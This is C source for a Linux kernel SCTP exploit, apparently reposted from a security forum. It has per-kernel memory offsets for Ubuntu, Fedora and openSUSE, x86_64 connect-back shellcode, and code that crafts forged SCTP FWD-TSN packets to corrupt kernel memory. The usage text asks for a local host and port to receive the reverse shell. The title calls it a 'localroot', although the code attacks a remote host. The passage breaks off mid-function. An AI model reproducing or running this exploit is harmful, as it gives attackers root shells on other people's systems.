Linux Kernel 2.6.x localroot 2013 ./JM511

1. Linux Kernel 2.6.x localroot 2013
2.  
3. */
4. * www.is-sec.com/vb/ * JM511
5. * Supported target:
6. * Ubuntu 7.04 x86_64 (2.6.20_15-17-generic / 2.6.20_17-server)
7. * Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)
8. * Ubuntu 8.10 x86_64 (2.6.27_7-10 geenric/server)
9. */
10.  
11.  
12.  
13. Code from here >
14.  
15. #define _GNU_SOURCE
16.  
17. #include <signal.h>
18. #include <sched.h>
19. #include <stdio.h>
20. #include <string.h>
21. #include <arpa/inet.h>
22. #include <unistd.h>
23. #include <sys/types.h>
24. #include <netinet/in.h>
25. #include <netinet/ip.h>
26. #include <netinet/sctp.h>
27. #include <stdlib.h>
28. #include <sys/wait.h>
29. #include <sys/time.h>
30. #include <sys/select.h>
31. #include <stdint.h>
32.  
33. #define __OFFSET_PORT_64 62 // 92
34. #define __OFFSET_HOST_64 64 // 94
35.  
36. //#define __TARGET_SPORT 20000
37.  
38.  
39. #ifndef __u8
40. #define __u8 uint8_t
41. #endif
42.  
43. #ifndef __u16
44. #define __u16 uint16_t
45. #endif
46.  
47. #ifndef __u32
48. #define __u32 uint32_t
49. #endif
50.  
51.  
52.  
53. /* start crc routines: ripped from wireshark sources */
54. #define SP_LEN 2
55. #define DP_LEN 2
56. #define VTAG_LEN 4
57. #define CHK_LEN 4
58. #define HEADER_LEN (SP_LEN + DP_LEN + VTAG_LEN + CHK_LEN)
59.  
60.  
61. #define CRC32C(c,d) (c=(c>>8)^crc_c[(c^(d))&0xFF])
62. static int32_t crc_c[256] =
63. {
64. 0x00000000L, 0xF26B8303L, 0xE13B70F7L, 0x1350F3F4L,
65. 0xC79A971FL, 0x35F1141CL, 0x26A1E7E8L, 0xD4CA64EBL,
66. 0x8AD958CFL, 0x78B2DBCCL, 0x6BE22838L, 0x9989AB3BL,
67. 0x4D43CFD0L, 0xBF284CD3L, 0xAC78BF27L, 0x5E133C24L,
68. 0x105EC76FL, 0xE235446CL, 0xF165B798L, 0x030E349BL,
69. 0xD7C45070L, 0x25AFD373L, 0x36FF2087L, 0xC494A384L,
70. 0x9A879FA0L, 0x68EC1CA3L, 0x7BBCEF57L, 0x89D76C54L,
71. 0x5D1D08BFL, 0xAF768BBCL, 0xBC267848L, 0x4E4DFB4BL,
72. 0x20BD8EDEL, 0xD2D60DDDL, 0xC186FE29L, 0x33ED7D2AL,
73. 0xE72719C1L, 0x154C9AC2L, 0x061C6936L, 0xF477EA35L,
74. 0xAA64D611L, 0x580F5512L, 0x4B5FA6E6L, 0xB93425E5L,
75. 0x6DFE410EL, 0x9F95C20DL, 0x8CC531F9L, 0x7EAEB2FAL,
76. 0x30E349B1L, 0xC288CAB2L, 0xD1D83946L, 0x23B3BA45L,
77. 0xF779DEAEL, 0x05125DADL, 0x1642AE59L, 0xE4292D5AL,
78. 0xBA3A117EL, 0x4851927DL, 0x5B016189L, 0xA96AE28AL,
79. 0x7DA08661L, 0x8FCB0562L, 0x9C9BF696L, 0x6EF07595L,
80. 0x417B1DBCL, 0xB3109EBFL, 0xA0406D4BL, 0x522BEE48L,
81. 0x86E18AA3L, 0x748A09A0L, 0x67DAFA54L, 0x95B17957L,
82. 0xCBA24573L, 0x39C9C670L, 0x2A993584L, 0xD8F2B687L,
83. 0x0C38D26CL, 0xFE53516FL, 0xED03A29BL, 0x1F682198L,
84. 0x5125DAD3L, 0xA34E59D0L, 0xB01EAA24L, 0x42752927L,
85. 0x96BF4DCCL, 0x64D4CECFL, 0x77843D3BL, 0x85EFBE38L,
86. 0xDBFC821CL, 0x2997011FL, 0x3AC7F2EBL, 0xC8AC71E8L,
87. 0x1C661503L, 0xEE0D9600L, 0xFD5D65F4L, 0x0F36E6F7L,
88. 0x61C69362L, 0x93AD1061L, 0x80FDE395L, 0x72966096L,
89. 0xA65C047DL, 0x5437877EL, 0x4767748AL, 0xB50CF789L,
90. 0xEB1FCBADL, 0x197448AEL, 0x0A24BB5AL, 0xF84F3859L,
91. 0x2C855CB2L, 0xDEEEDFB1L, 0xCDBE2C45L, 0x3FD5AF46L,
92. 0x7198540DL, 0x83F3D70EL, 0x90A324FAL, 0x62C8A7F9L,
93. 0xB602C312L, 0x44694011L, 0x5739B3E5L, 0xA55230E6L,
94. 0xFB410CC2L, 0x092A8FC1L, 0x1A7A7C35L, 0xE811FF36L,
95. 0x3CDB9BDDL, 0xCEB018DEL, 0xDDE0EB2AL, 0x2F8B6829L,
96. 0x82F63B78L, 0x709DB87BL, 0x63CD4B8FL, 0x91A6C88CL,
97. 0x456CAC67L, 0xB7072F64L, 0xA457DC90L, 0x563C5F93L,
98. 0x082F63B7L, 0xFA44E0B4L, 0xE9141340L, 0x1B7F9043L,
99. 0xCFB5F4A8L, 0x3DDE77ABL, 0x2E8E845FL, 0xDCE5075CL,
100. 0x92A8FC17L, 0x60C37F14L, 0x73938CE0L, 0x81F80FE3L,
101. 0x55326B08L, 0xA759E80BL, 0xB4091BFFL, 0x466298FCL,
102. 0x1871A4D8L, 0xEA1A27DBL, 0xF94AD42FL, 0x0B21572CL,
103. 0xDFEB33C7L, 0x2D80B0C4L, 0x3ED04330L, 0xCCBBC033L,
104. 0xA24BB5A6L, 0x502036A5L, 0x4370C551L, 0xB11B4652L,
105. 0x65D122B9L, 0x97BAA1BAL, 0x84EA524EL, 0x7681D14DL,
106. 0x2892ED69L, 0xDAF96E6AL, 0xC9A99D9EL, 0x3BC21E9DL,
107. 0xEF087A76L, 0x1D63F975L, 0x0E330A81L, 0xFC588982L,
108. 0xB21572C9L, 0x407EF1CAL, 0x532E023EL, 0xA145813DL,
109. 0x758FE5D6L, 0x87E466D5L, 0x94B49521L, 0x66DF1622L,
110. 0x38CC2A06L, 0xCAA7A905L, 0xD9F75AF1L, 0x2B9CD9F2L,
111. 0xFF56BD19L, 0x0D3D3E1AL, 0x1E6DCDEEL, 0xEC064EEDL,
112. 0xC38D26C4L, 0x31E6A5C7L, 0x22B65633L, 0xD0DDD530L,
113. 0x0417B1DBL, 0xF67C32D8L, 0xE52CC12CL, 0x1747422FL,
114. 0x49547E0BL, 0xBB3FFD08L, 0xA86F0EFCL, 0x5A048DFFL,
115. 0x8ECEE914L, 0x7CA56A17L, 0x6FF599E3L, 0x9D9E1AE0L,
116. 0xD3D3E1ABL, 0x21B862A8L, 0x32E8915CL, 0xC083125FL,
117. 0x144976B4L, 0xE622F5B7L, 0xF5720643L, 0x07198540L,
118. 0x590AB964L, 0xAB613A67L, 0xB831C993L, 0x4A5A4A90L,
119. 0x9E902E7BL, 0x6CFBAD78L, 0x7FAB5E8CL, 0x8DC0DD8FL,
120. 0xE330A81AL, 0x115B2B19L, 0x020BD8EDL, 0xF0605BEEL,
121. 0x24AA3F05L, 0xD6C1BC06L, 0xC5914FF2L, 0x37FACCF1L,
122. 0x69E9F0D5L, 0x9B8273D6L, 0x88D28022L, 0x7AB90321L,
123. 0xAE7367CAL, 0x5C18E4C9L, 0x4F48173DL, 0xBD23943EL,
124. 0xF36E6F75L, 0x0105EC76L, 0x12551F82L, 0xE03E9C81L,
125. 0x34F4F86AL, 0xC69F7B69L, 0xD5CF889DL, 0x27A40B9EL,
126. 0x79B737BAL, 0x8BDCB4B9L, 0x988C474DL, 0x6AE7C44EL,
127. 0xBE2DA0A5L, 0x4C4623A6L, 0x5F16D052L, 0xAD7D5351L,
128. };
129.  
130. static __u32 sctp_crc32c(const unsigned char* buf, __u32 len)
131. {
132. __u32 i;
133. __u32 crc32 = ~0U;
134. __u32 r;
135. unsigned char b0,b1,b2,b3;
136.  
137. for (i = 0; i < SP_LEN + DP_LEN + VTAG_LEN; i++)
138. {
139. CRC32C(crc32, buf[i]);
140. }
141. CRC32C(crc32, 0);
142. CRC32C(crc32, 0);
143. CRC32C(crc32, 0);
144. CRC32C(crc32, 0);
145. for (i = HEADER_LEN; i < len; i++)
146. {
147. CRC32C(crc32, buf[i]);
148. }
149. r = ~crc32;
150.  
151. b0 = r & 0xff;
152. b1 = (r>>8) & 0xff;
153. b2 = (r>>16) & 0xff;
154. b3 = (r>>24) & 0xff;
155. crc32 = ((b0 << 24) | (b1 << 16) | (b2 << 8) | b3);
156. return ( crc32 );
157. }
158. /* end crc routines */
159.  
160. static char generic_x86_64_shellcode[] =
161. // prolog
162. "\x90\x53\x48\x31\xc0\xb0\x66\x0f\x05\x48\x31\xdb"
163. "\x48\x39\xd8\x75\x0f\x48\x31\xc0\xb0\x02\xcd\x80"
164. "\x48\x31\xdb\x48\x39\xc3\x74\x09\x5b\x48\x31\xc0"
165. "\xb0\x60\x0f\x05\xc3"
166. // connect back
167. "\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58"
168. "\x0f\x05\x48\x97\x50\x48\xb9\x02\x00\x0d\x05\x7f"
169. "\x00\x00\x01\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a"
170. "\x58\x0f\x05\x48\x31\xdb\x48\x39\xc3\x74\x07\x48"
171. "\x31\xc0\xb0\xe7\x0f\x05\x90"
172. "\x6a\x03\x5e\x6a\x21\x58\x48\xff\xce\x0f\x05\x75"
173. "\xf6\x48\xbb\xd0\x9d\x96\x91\xd0\x8c\x97\xff\x48"
174. "\xf7\xd3\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48"
175. "\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05\x48\x31\xc0"
176. "\xb0\xe7\x0f\x05"
177. ;
178.  
179. static const char __zero[4] = {0x00, 0x00, 0x00, 0x00};
180. //static char __force_crash[] = "\x41\x41\x41\x41\x41\x41\x41\x41";
181.  
182. static char generic_x86_64_patchjump[] = "\x48\x31\xc0\xb0\x60\x0f\x05\xc3";
183. static char generic_x86_64_jump[] = "\xe9\x2b\x09\x00\x00\x90";
184.  
185. /* ubuntu 7.04 */
186. static char ubuntu64_2_6_20_15to17_generic_x86_64_vsys_shadow[] = "\x00\x40\x56\x80\xFF\xFF\xFF\xFF";
187. static char ubuntu64_2_6_20_17_server_x86_64_vsys_shadow[] = "\x00\x90\x5B\x80\xFF\xFF\xFF\xFF";
188.  
189. /* ubuntu 8.04 */
190. static char ubuntu64_2_6_24_23_last_server_x86_64_vsys_shadow[] = "\x00\x50\x62\x80\xFF\xFF\xFF\xFF";
191. static char ubuntu64_2_6_24_19to22_server_x86_64_vsys_shadow[] = "\x00\x40\x62\x80\xFF\xFF\xFF\xFF";
192. static char ubuntu64_2_6_24_16to18_server_x86_64_vsys_shadow[] = "\x00\x30\x62\x80\xFF\xFF\xFF\xFF";
193.  
194. static char ubuntu64_2_6_24_18to21_generic_x86_64_vsys_shadow[] = "\x00\x40\x5d\x80\xFF\xFF\xFF\xFF";
195.  
196. /* ubuntu 8.10 */
197. static char ubuntu64_2_6_27_7_server_x86_64_vsys_shadow[] = "\x00\x30\x6f\x80\xFF\xFF\xFF\xFF";
198. static char ubuntu64_2_6_27_9tolast_server_x86_64_vsys_shadow[] = "\x00\x40\x6f\x80\xFF\xFF\xFF\xFF";
199.  
200. static char ubuntu64_2_6_27_7tolast_generic_x86_64_vsys_shadow[] = "\x00\x40\x6f\x80\xFF\xFF\xFF\xFF";
201.  
202. /* fedora code 10 */
203. static char fedora64_10_default_kernel_x86_64_vsys_shadow[] = "\x00\x10\x57\x81\xFF\xFF\xFF\xFF";
204. static char fedora64_10_default_kernel_x86_64_selinux[] = "\x84\xE6\x7C\x81\xFF\xFF\xFF\xFF";
205.  
206. /* opensuse 11.1 */
207. static char opensuse64_11_1_default_kernel_x86_64_vsys_shadow[]="\x00\x10\x8E\x80\xFF\xFF\xFF\xFF";
208.  
209.  
210. #define __msg_f(format, args...) \
211. do { fprintf(stdout, format, ## args); } while(0)
212.  
213. #define __msg(msg) \
214. do { fprintf(stdout, "%s", msg); } while(0)
215.  
216. #define __fatal(msg) \
217. do {fprintf(stderr, "%s", msg); exit(1);} while (0)
218.  
219. #define __fatal_perror(msg) \
220. do { perror(msg); exit(1); } while (0)
221.  
222. enum {
223. SLAB_ALLOCATOR=0,
224. SLUB_ALLOCATOR=1
225. };
226.  
227. typedef struct
228. {
229. const char *name;
230. const char *info;
231. char *scode;
232. __u32 scodesize;
233. __u32 portoff;
234. __u32 hostoff;
235. const char *vsysaddr;
236. const char *vsysjump;
237. __u32 vsysjumpsize;
238.  
239. const char *vsyspatchjump;
240. __u32 vsyspatchjumpsize;
241.  
242. __u32 chunksize;
243. __u32 slubsize;
244. __u32 ptrsize;
245.  
246. const char *selinux;
247.  
248. int allocator_type;
249.  
250. } kinfo;
251.  
252. static kinfo *k;
253.  
254. typedef struct
255. {
256. const char* target;
257. const char* rhost;
258. const char* lhost;
259. __u16 rport;
260. __u16 lport;
261.  
262. __u16 sport; // defines associations
263. __u16 nconn;
264.  
265. } hinfo;
266.  
267. static hinfo h = { NULL, NULL, NULL, 0, 0, 0, 600 };
268.  
269. static kinfo kernels[] = {
270. {
271. "ubuntu64_faisty-2.6.20-[15-17]-generic",
272. "(faisty: generic kernel)",
273. generic_x86_64_shellcode,
274. sizeof(generic_x86_64_shellcode) -1,
275. __OFFSET_PORT_64,
276. __OFFSET_HOST_64,
277. ubuntu64_2_6_20_15to17_generic_x86_64_vsys_shadow,
278. generic_x86_64_jump,
279. 6,
280. generic_x86_64_patchjump,
281. 8,
282. 40,
283. 256,
284. 8,
285. NULL,
286. SLAB_ALLOCATOR
287. },
288. {
289. "ubuntu64_faisty-2.6.20-17-server",
290. "(faisty: server kernel - last 2.6.20-17 build)",
291. generic_x86_64_shellcode,
292. sizeof(generic_x86_64_shellcode) -1,
293. __OFFSET_PORT_64,
294. __OFFSET_HOST_64,
295. ubuntu64_2_6_20_17_server_x86_64_vsys_shadow,
296. generic_x86_64_jump,
297. 6,
298. generic_x86_64_patchjump,
299. 8,
300. 40,
301. 256,
302. 8,
303. NULL,
304. SLAB_ALLOCATOR
305. },
306. {
307. "ubuntu64_hardy-2.6.24-[18-21]-generic",
308. "(kernel from 2.6.24-18 to kernel 2.6.24-21 -- generic)",
309. generic_x86_64_shellcode,
310. sizeof(generic_x86_64_shellcode) -1,
311. __OFFSET_PORT_64,
312. __OFFSET_HOST_64,
313. ubuntu64_2_6_24_18to21_generic_x86_64_vsys_shadow,
314. generic_x86_64_jump,
315. 6,
316. generic_x86_64_patchjump,
317. 8,
318. 40,
319. 96,
320. 8,
321. NULL,
322. SLUB_ALLOCATOR
323. },
324. {
325. "ubuntu64_hardy_2.6.24-[16-18]-server",
326. "(kernel from 2.6.24-16 to 2.6.24-18 -- server)",
327. generic_x86_64_shellcode,
328. sizeof(generic_x86_64_shellcode) -1,
329. __OFFSET_PORT_64,
330. __OFFSET_HOST_64,
331. ubuntu64_2_6_24_16to18_server_x86_64_vsys_shadow,
332. generic_x86_64_jump,
333. 6,
334. generic_x86_64_patchjump,
335. 8,
336. 40,
337. 96,
338. 8,
339. NULL,
340. SLUB_ALLOCATOR
341. },
342. {
343. "ubuntu64_hardy-2.6.24-[19-22]-server",
344. "(kernel from 2.6.24-19 to 2.6.24-22 -- server)",
345. generic_x86_64_shellcode,
346. sizeof(generic_x86_64_shellcode) -1,
347. __OFFSET_PORT_64,
348. __OFFSET_HOST_64,
349. ubuntu64_2_6_24_19to22_server_x86_64_vsys_shadow,
350. generic_x86_64_jump,
351. 6,
352. generic_x86_64_patchjump,
353. 8,
354. 40,
355. 96,
356. 8,
357. NULL,
358. SLUB_ALLOCATOR
359. },
360. {
361. "ubuntu64_hardy-2.6.24-23-last-server",
362. "(last 2.6.24-23 kernel before patch -- server)",
363. generic_x86_64_shellcode,
364. sizeof(generic_x86_64_shellcode) -1,
365. __OFFSET_PORT_64,
366. __OFFSET_HOST_64,
367. ubuntu64_2_6_24_23_last_server_x86_64_vsys_shadow,
368. generic_x86_64_jump,
369. 6,
370. generic_x86_64_patchjump,
371. 8,
372. 40,
373. 96,
374. 8,
375. NULL,
376. SLUB_ALLOCATOR
377. },
378. {
379. "ubuntu64_intrepid-2.6.27-7-server",
380. "(kernel 2.6.27-7 -- server)",
381. generic_x86_64_shellcode,
382. sizeof(generic_x86_64_shellcode) -1,
383. __OFFSET_PORT_64,
384. __OFFSET_HOST_64,
385. ubuntu64_2_6_27_7_server_x86_64_vsys_shadow,
386. generic_x86_64_jump,
387. 6,
388. generic_x86_64_patchjump,
389. 8,
390. 40,
391. 96,
392. 8,
393. NULL,
394. SLUB_ALLOCATOR
395. },
396. {
397. "ubuntu64_intrepid-2.6.27-[9-last]-server",
398. "(kernel 2.6.27-9 to the last unpatched kernel -- server)",
399. generic_x86_64_shellcode,
400. sizeof(generic_x86_64_shellcode) -1,
401. __OFFSET_PORT_64,
402. __OFFSET_HOST_64,
403. ubuntu64_2_6_27_9tolast_server_x86_64_vsys_shadow,
404. generic_x86_64_jump,
405. 6,
406. generic_x86_64_patchjump,
407. 8,
408. 40,
409. 96,
410. 8,
411. NULL,
412. SLUB_ALLOCATOR
413. },
414. {
415. "ubuntu64_intrepid-2.6.27-[7-last]-generic",
416. "(kernel 2.6.27-9 to the last unpatched kernel -- server)",
417. generic_x86_64_shellcode,
418. sizeof(generic_x86_64_shellcode) -1,
419. __OFFSET_PORT_64,
420. __OFFSET_HOST_64,
421. ubuntu64_2_6_27_7tolast_generic_x86_64_vsys_shadow,
422. generic_x86_64_jump,
423. 6,
424. generic_x86_64_patchjump,
425. 8,
426. 40,
427. 96,
428. 8,
429. NULL,
430. SLUB_ALLOCATOR
431. },
432. {
433. "fedora64_10-2.6.25-117",
434. "(fedora core 10 default installed kernel)",
435. generic_x86_64_shellcode,
436. sizeof(generic_x86_64_shellcode) -1,
437. __OFFSET_PORT_64,
438. __OFFSET_HOST_64,
439. fedora64_10_default_kernel_x86_64_vsys_shadow,
440. generic_x86_64_jump,
441. 6,
442. generic_x86_64_patchjump,
443. 8,
444. 40,
445. 96,
446. 8,
447. fedora64_10_default_kernel_x86_64_selinux,
448. SLUB_ALLOCATOR
449. },
450. {
451. "opensuse64_11.1-2.6.27.7-9-default",
452. "(opensuse 11.1 default installed kernel)",
453. generic_x86_64_shellcode,
454. sizeof(generic_x86_64_shellcode) -1,
455. __OFFSET_PORT_64,
456. __OFFSET_HOST_64,
457. opensuse64_11_1_default_kernel_x86_64_vsys_shadow,
458. generic_x86_64_jump,
459. 6,
460. generic_x86_64_patchjump,
461. 8,
462. 40,
463. 256,
464. 8,
465. NULL,
466. SLAB_ALLOCATOR
467. }
468. };
469.  
470.  
471.  
472. /* modular arithmetic shift */
473. #define __SHIFT_CHECK 0x7FFF
474. static __u16 shift_0_to_7fff[3] = { 0x7FFF, 0xFFFE, 0x0000 };
475. static __u16 shift_8000_to_ffff[3] = { 0xFFFF, 0x7FFE, 0x8000 };
476.  
477. /* global streams obj */
478. static __u16 streams[1000][2];
479.  
480. /* get stream flow */
481. static int build_stream(const void *data, __u32 size, __u16 fc)
482. {
483. int chunk_num,i,j,stnum=0;
484. __u16 *p;
485. __u16 *shift;
486. if(size % 2)
487. __fatal("[!!!] build_stream: data unaligned");
488.  
489. memset(streams, 0x00, sizeof(streams));
490.  
491. chunk_num = size / 2;
492. p = (__u16*)data;
493. for(i=0; i<chunk_num; i++, p++, fc++)
494. {
495. __u16 val = *p - 1;
496. if(val <= __SHIFT_CHECK)
497. shift = shift_0_to_7fff;
498. else
499. shift = shift_8000_to_ffff;
500.  
501. for(j=0; j<3; j++)
502. {
503. streams[stnum][0] = fc;
504. streams[stnum++][1] = shift[j];
505. }
506.  
507. streams[stnum][0] = fc;
508. streams[stnum++][1] = val;
509. }
510.  
511. return stnum ? stnum : 0;
512. }
513.  
514.  
515. /* some sctp packet header structs */
516. struct sctp_hdr
517. {
518. __u16 sport;
519. __u16 dport;
520. __u32 vtag;
521. __u32 checksum;
522. char chunks[0];
523. }__attribute__((packed));
524.  
525. struct sctp_chk
526. {
527. __u8 type;
528. __u8 flags;
529. __u16 len;
530. char data[0];
531. }__attribute((packed));
532.  
533. struct sctp_chunk_fwd
534. {
535. __u8 type;
536. __u8 flags;
537. __u16 len;
538. __u32 new_tsn;
539. }__attribute__((packed));
540.  
541.  
542.  
543. enum
544. {
545. SCTP_INIT_ACK = 2,
546. SCTP_SACK = 3,
547. SCTP_FWD = 192
548. };
549.  
550.  
551. void disable_abort()
552. {
553. /* lame trick to block ABORT chunks from reaching the target!
554. * ABORT messages are generated because we receive a SACK with an out-of-bound TSN
555. * in reply to all fake FWD sent
556. * (when this happens local kernel kills the connection)
557. */
558.  
559. system("iptables -t filter -A OUTPUT -p sctp --chunk-types any ABORT -j DROP");
560. }
561.  
562. #define FWD_MAX_SIZE 0x1000
563. void *make_fwd_packet(__u16 sp, __u16 dp, __u32 vtag, __u32 tsn,
564. __u16 streams[][2], int streamlen, int *p_len)
565. {
566. int i;
567. __u16 *pstream;
568. struct sctp_hdr *hdr;
569. struct sctp_chunk_fwd *fwd;
570. __u8 *__buff = malloc(FWD_MAX_SIZE);
571. memset(__buff, 0, FWD_MAX_SIZE);
572.  
573. hdr = (struct sctp_hdr *)__buff;
574.  
575. hdr->sport = htons(sp);
576. hdr->dport = htons(dp);
577. hdr->vtag = htonl(vtag);
578. hdr->checksum = 0;
579. fwd = (struct sctp_chunk_fwd *)(hdr->chunks);
580. fwd->type = SCTP_FWD;
581. fwd->flags = 0;
582. fwd->len = htons(4 + 4 + (streamlen * 4)); // chunk + ctsn + streams
583. fwd->new_tsn = htonl(tsn+1);
584.  
585. /* build stream */
586. pstream = (__u16 *)((&(fwd->new_tsn)) + 1);
587. for(i=0; i<streamlen; i++)
588. {
589. *pstream++ = streams[i][0];
590. *pstream++ = streams[i][1];
591. }
592.  
593. *p_len = ntohs(fwd->len) + sizeof(*hdr);
594. hdr->checksum = htonl(sctp_crc32c(__buff, (__u32)(*p_len)));
595. return hdr;
596. }
597.  
598.  
599.  
600. /* this function gets VTAG/TSN bound with this socket pair */
601. int raw_socket_engine(__u16 sp, __u16 sp2, __u16 dp,
602. __u32 *tsn, __u32 *vtag, __u32 *tsn2, __u32 *vtag2)
603. {
604. char packet[1500];
605. int p_len;
606. void *end;
607. struct sctp_hdr *hdr;
608. struct sctp_chk *chk;
609. __u32 tmp;
610. __u16 psp,pdp;
611. fd_set r;
612. struct timeval tv;
613.  
614. int raw_fd = socket(PF_INET, SOCK_RAW, IPPROTO_SCTP);
615. if(raw_fd < 0)
616. __fatal_perror("socket: RAW/SCTP");
617.  
618.  
619. FD_ZERO(&r);
620. FD_SET(raw_fd, &r);
621. tv.tv_usec=0;
622. tv.tv_sec=10;
623.  
624. while(select(raw_fd + 1, &r, NULL,NULL,&tv) > 0)
625. {
626. p_len = read(raw_fd, packet, sizeof(packet));
627. end = packet + p_len;
628. hdr = (struct sctp_hdr *)(packet + sizeof(struct iphdr));
629. if((void*)(((char *)hdr)+4) >= end)
630. continue;
631.  
632. /* check for chunk */
633. chk = (struct sctp_chk *)(hdr->chunks);
634. tmp = ntohl(*((__u32*)(chk->data)));
635. psp = ntohs(hdr->sport);
636. pdp = ntohs(hdr->dport);
637.  
638. if(chk->type == SCTP_SACK)
639. {
640. if(psp == dp && pdp == sp)
641. *tsn = tmp;
642.  
643. if(psp == dp && pdp == sp2)
644. *tsn2 = tmp;
645. }
646.  
647. if(chk->type == SCTP_INIT_ACK)
648. {
649. if(psp == dp && pdp == sp)
650. *vtag = tmp;
651.  
652. if(psp == dp && pdp == sp2)
653. *vtag2 = tmp;
654. }
655.  
656. if(*vtag && *tsn && *vtag2 && *tsn2)
657. break;
658.  
659. FD_ZERO(&r);
660. FD_SET(raw_fd, &r);
661. tv.tv_usec=0;
662. tv.tv_sec=10;
663. }
664.  
665. return 0;
666. }
667.  
668. /* global vars */
669. static __u16 sport=0;
670. static __u16 sport2=0;
671. static __u32 vtag=0, vtag2=0;
672. static __u32 tsn=0, tsn2=0;
673.  
674. static struct sockaddr_in server_sctp;
675. int raw_sctp=-1;
676.  
677. #define STACK_SIZE 0x1000
678. char clone_stack[STACK_SIZE*2];
679.  
680.  
681. static void send_fwd_chunk(__u16 sp, __u16 dp, __u16 streams[][2],
682. int streamlen, __u32 vtag, __u32 tsn)
683. {
684. int p_len=0, ret;
685. void *packet = make_fwd_packet(sp, dp, vtag, tsn, streams, streamlen, &p_len);
686. ret = sendto(raw_sctp, packet, p_len, 0, (struct sockaddr *)&server_sctp, sizeof(struct sockaddr_in));
687. if(ret < 0)
688. __fatal_perror("sendto: sending FWD chunk");
689.  
690. free(packet);
691. }
692.  
693.  
694.  
695. static int clone_thread(void *p)
696. {
697. raw_socket_engine(sport, sport2, h.rport, &tsn, &vtag, &tsn2, &vtag2);
698. return 0;
699. }
700.  
701.  
702. static int make_sctp_connection(__u16 sp, __u16 dp, int data)
703. {
704. struct sctp_initmsg msg;
705. int ret,o=1,fd;
706. socklen_t len_sctp=sizeof(struct sctp_initmsg);
707. struct sockaddr_in s,c;
708.  
709. fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);
710. if(fd < 0)
711. __fatal_perror("socket: sctp SOCK_STREAM");
712.  
713. ret = setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, (char *)&o, sizeof(o));
714. if (ret < 0)
715. __fatal_perror("setsockopt: SO_REUSEADDR");
716.  
717.  
718. /* NOTE: here we assume server peer allocates 10 output streams (as default)
719. * if the applciation behaves differently you must probe and change channels size
720. * to get the correct slab */
721.  
722. if(k->allocator_type == SLAB_ALLOCATOR) // if SLAB change channel size
723. {
724. getsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, &len_sctp);
725. msg.sinit_num_ostreams=50; // force 256 slab allocation
726. msg.sinit_max_instreams=10;
727. setsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, len_sctp);
728. }
729. else
730. {
731. getsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, &len_sctp);
732. msg.sinit_num_ostreams=10; // force 96 slab allocation
733. msg.sinit_max_instreams=10;
734. setsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, len_sctp);
735. }
736.  
737.  
738. if(sp)
739. {
740. c.sin_family = PF_INET;
741. c.sin_port = htons(sp);
742. c.sin_addr.s_addr = INADDR_ANY;
743. ret = bind(fd, (struct sockaddr *)&c, sizeof(c));
744. if(ret < 0)
745. __fatal_perror("bind: sctp socket");
746. }
747.  
748. s.sin_family = PF_INET;
749. s.sin_port = htons(dp);
750. s.sin_addr.s_addr = inet_addr(h.rhost);
751.  
752. ret = connect(fd, (struct sockaddr *)&s, sizeof(s));
753. if(ret < 0)
754. __fatal_perror("connect: sctp socket");
755.  
756.  
757. /* send one byte of data to get correctly
758. * TSN from raw socket (from SACK replies)
759. */
760. if(data)
761. {
762. ret = send(fd, "", 1, 0);
763. if(ret < 0)
764. __fatal_perror("send: sctp socket data");
765. }
766. return fd;
767. }
768.  
769.  
770. static void htons_streams(__u16 s[][2], int len)
771. {
772. int i;
773. for(i=0; i<len; i++)
774. {
775. s[i][0] = htons(s[i][0]);
776. s[i][1] = htons(s[i][1]);
777. }
778. }
779.  
780.  
781. static void usage()
782. {
783. fprintf(stderr, "./sctp_houdini \n\t"
784. "-H lhost (local host address for connect back shel)\n\t"
785. "-P lport (local port address for connect back shell)\n\t"
786. "-h rhost (remote target host)\n\t"
787. "-p rport (remote target port)\n\t"
788. "-t kernel (target kernel)\n\t"
789. "-s sport (source port defining sctp association where corruption occurs)\n\t"
790. " (always use higher port if you run the exploit multiple times eg. 20000, 21000, etc..)\n\t"
791. " (NEVER reuse the same or next port or vsys will be trashed and init will die soon...)\n\t"
792. "-c conn (number of connectionis before corruption - default 600)\n"
793. );
794. }
795.  
796. static void sctp_getopt(int argc, char *argv[])
797. {
798. int ret,i;
799.  
800. while((ret = getopt(argc, argv, "H:P:p:h:t:c:s:")) != -1)
801. {
802. switch(ret)
803. {
804. case 'P':
805. h.lport = atoi(optarg);
806. break;
807.  
808. case 'p':
809. h.rport = atoi(optarg);
810. break;
811.  
812. case 't':
813. h.target = optarg;
814. break;
815.  
816. case 'h':
817. h.rhost = optarg;
818. break;
819.  
820. case 'H':
821. h.lhost = optarg;
822.  
823. case 'c':
824. h.nconn = atoi(optarg);
825. break;
826.  
827. case 's':
828. h.sport = atoi(optarg);
829. break;
830. }
831. }
832.  
833.  
834. if(!h.lport || !h.rport || !h.rhost || !h.target || !h.lhost || !h.sport)
835. {
836. usage();
837. exit(1);
838. }
839.  
840. if(h.sport < h.nconn+1)
841. {
842. fprintf(stderr, "Source Association Port is too low: %d\n", h.sport);
843. usage();
844. exit(1);
845. }
846.  
847. sport=h.sport;
848. sport2=h.sport + 1;
849.  
850. for(i=0; i < sizeof(kernels)/sizeof(kinfo); i++)
851. {
852. if(!strcmp(h.target, kernels[i].name))
853. {
854. k = &kernels[i];
855. break;
856. }
857. }
858.  
859. if(k==NULL)
860. {
861. fprintf(stderr, "Unable to find target: %s\nAvailable targets are:\n", h.target);
862. for(i=0; i < sizeof(kernels)/sizeof(kinfo); i++)
863. {
864. fprintf(stderr, "- %s %s\n", kernels[i].name, kernels[i].info);
865. }
866. exit(1);
867. }
868. }
869.  
870. void patchjump()
871. {
872. int ret;
873.  
874. __msg("[**] Restoring vsys: Emulate gettimeofday()... \n");
875. ret = build_stream(k->vsyspatchjump, k->vsyspatchjumpsize, 0);
876. if(ret < 0)
877. __fatal("Error Building Streams...");
878.  
879. htons_streams(streams, ret);
880. send_fwd_chunk(sport2, h.rport, streams, ret, vtag2, tsn2);
881.  
882. }
883.  
884.  
885. static void multiplex(int listenfd)
886. {
887. int ret,new_fd;
888. fd_set r;
889. struct timeval t;
890. char buffer[1500];
891.  
892.  
893. FD_ZERO(&r);
